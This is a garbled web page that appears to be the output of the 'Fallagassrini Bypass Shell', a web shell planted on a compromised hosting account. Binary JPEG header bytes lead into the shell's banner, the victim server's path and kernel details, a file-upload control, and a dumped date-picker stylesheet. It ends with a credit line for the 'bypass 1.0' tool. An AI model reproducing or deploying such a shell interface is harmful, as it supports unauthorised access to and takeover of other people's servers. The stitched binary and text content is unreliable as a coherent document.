JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/html/js/libs/glDatePicker/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/html/js/libs/glDatePicker/developr.css

/*
	glDatePicker default style

	http: //code.gautamlad.com/glDatePicker/
	https: //github.com/glad/glDatePicker/
*/

/* Calendar container div */
.gldp-default {
	float: left;
	background-color: #F0F4F7;
	border: 0;
	-webkit-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.45);
	-moz-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.45);
	box-shadow: 0 2px 4px rgba(0, 0, 0, 0.45);
}

/* Table style */
.gldp-default table {
	border-spacing: 0;
	border-collapse: collapse;
	background-color: #F0F4F7;
}

/* Default row height */
.gldp-default tr {
	line-height: 30px;
}

/* Default style of cell */
.gldp-default td {
	margin: 0;
	padding: 0;
	width: 33px;
	text-align: center;
}

.gldp-default-prevnext,
.gldp-default-monyear {
	color: white;
	line-height: 38px;
	white-space: nowrap;
	font-weight: bold;
	background: #00438d url(../../../img/old-browsers/colors/bg_blue-gradient.png) repeat-x;
	-webkit-background-size: 100% 100%;
	-moz-background-size: 100% 100%;
	-o-background-size: 100% 100%;
	background-size: 100% 100%;
	background: -webkit-gradient(linear, left top, left bottom, from(#006aac), to(#00438d));
	background: -webkit-linear-gradient(top, #006aac, #00438d);
	background: -moz-linear-gradient(top, #006aac, #00438d);
	background: -ms-linear-gradient(top, #006aac, #00438d);
	background: -o-linear-gradient(top, #006aac, #00438d);
	background: linear-gradient(top, #006aac, #00438d);
	-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.25);
	-moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.25);
	box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.25);
	-webkit-text-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.65);
	-moz-text-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.65);
	text-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.65);
	}

/* Previous and Next arrows */
.gldp-default-prevnext {
	cursor: pointer;
	font-size: 12px;
	border-top: 1px solid #004795;
	border-right: 1px solid #004795;
	border-bottom: 1px solid #004795;
	}
	.gldp-default-prevnext:first-child {
		border-right: 0;
		border-left: 1px solid #004795;
	}

/* Month Year title */
.gldp-default-monyear {
	border-top: 1px solid #004795;
	border-bottom: 1px solid #004795;
	font-size: 17px;
	width: auto;
}

/* Days of the week (Sun, Mon, ...) */
tr.gldp-default-dow {
	font-size: 9px;
	line-height: 20px;
	color: #666666;
	font-weight: bold;
	text-transform: uppercase;
	background: #e4e7eb url(../../../img/old-browsers/colors/bg_white-gradient.png) repeat-x;
	-webkit-background-size: 100% 100%;
	-moz-background-size: 100% 100%;
	-o-background-size: 100% 100%;
	background-size: 100% 100%;
	background: -webkit-gradient(linear, left top, left bottom, from(#f7f7fa), to(#e4e7eb));
	background: -webkit-linear-gradient(top, #f7f7fa, #e4e7eb);
	background: -moz-linear-gradient(top, #f7f7fa, #e4e7eb);
	background: -ms-linear-gradient(top, #f7f7fa, #e4e7eb);
	background: -o-linear-gradient(top, #f7f7fa, #e4e7eb);
	background: linear-gradient(top, #f7f7fa, #e4e7eb);
	}
	tr.gldp-default-dow > td {
		padding-top: 1px;
		-webkit-box-shadow: inset 0 2px 0 #c7c9ca;
		-moz-box-shadow: inset 0 2px 0 #c7c9ca;
		box-shadow: inset 0 2px 0 #c7c9ca;
		-webkit-text-shadow: 0 1px 0 white;
		-moz-text-shadow: 0 1px 0 white;
		text-shadow: 0 1px 0 white;
	}


.gldp-days {
	border-top: 1px solid #ececec;
	border-left: 1px solid #ececec;
	font-size: 12px;
	}
	.gldp-default-dow + tr > .gldp-days {
		border-top: 1px solid #ced3d6;
	}
	.gldp-days:first-child {
		border-left: 0;
	}

/* Selectable days */
.gldp-default-day,
.gldp-default-day-hover {
	font-weight: bold;
	cursor: pointer;
	}
	.gldp-default-day {
		color: #6c7174;
	}
	.gldp-default-day-hover {
		background: #e5e5e5;
		-webkit-text-shadow: 0 1px 0 white;
		-moz-text-shadow: 0 1px 0 white;
		text-shadow: 0 1px 0 white;
	}

/* Selected days */
.gldp-default-selected {
	background-color: #e5e5e5;
	border: solid 1px #c3c7ca;
	font-weight: bold;
	-webkit-text-shadow: 0 1px 0 white;
	-moz-text-shadow: 0 1px 0 white;
	text-shadow: 0 1px 0 white;
}

/* Today */
.gldp-default-today,
.gldp-default-today-hover {
	color: #fff;
	cursor: pointer;
	font-weight: bold;
	-webkit-text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.65);
	-moz-text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.65);
	text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.65);
	}
	.gldp-default-today {
		background-color: #004a95;
	}
	.gldp-default-today-hover {
		background-color: #005dba;
	}

/* Weekends */
.gldp-default-sat, .gldp-default-sun {
	background-color: #fff;
	color: #666;
	font-weight: bold;
}
.gldp-default-sat-hover, .gldp-default-sun-hover {
	background-color: #fff;
	color: #004f8f;
	cursor: pointer;
	font-weight: bold;
}

/* Non-selectable day.  Includes: previous/next month days and days that fall in the allowOld and endDate conditions */
.gldp-default-noday {
	background-color: #f2f2f2;
	color: #cfd1d2;
	cursor: wait;
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net